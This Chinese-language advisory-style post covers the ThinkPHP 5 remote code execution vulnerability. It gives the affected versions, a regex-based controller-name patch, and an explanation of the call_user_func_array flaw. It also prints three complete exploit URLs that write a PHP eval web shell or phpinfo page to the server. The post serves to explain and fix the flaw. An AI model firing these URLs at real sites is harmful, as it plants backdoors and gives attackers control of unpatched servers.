ThinkPHP5远程代码执行高危漏洞

影响版本

ThinkPHP 5.0系列 < 5.0.24

ThinkPHP 5.1系列 < 5.1.31

修复方法

5.0版本
在think\App类的module方法的获取控制器的代码后面加上以下代码
这个类的目录是:你就在thinkphp>library>think>app.php
在module静态方法加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
5.1版本
在think\route\dispatch\Url类的parseUrl方法,解析控制器后加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

漏洞描述

由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。

攻击原理

通过特定的url,利用PHP内置的函数call_user_func_array,如果两个参数均可控,则会造成命令执行

攻击url示例

http://tp5.cn/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5b0%5d=system&vars%5b1%5d%5b%5d=echo %5e<?php @eval($_GET%5b"code"%5d)?%5e>>shell.php

http://tp5.cn/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5b0%5d=system&vars%5b1%5d%5b%5d=echo %5e<?php echo phpinfo();?%5e>>shell.php

http://tp5.cn/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5b0%5d=system&vars%5b1%5d%5b%5d=echo %5e<?php @eval($_GET%5b"code"%5d)?%5e>>router.php

这里附上源码解析攻击原理

赞赏

微信赞赏支付宝赞赏

发表评论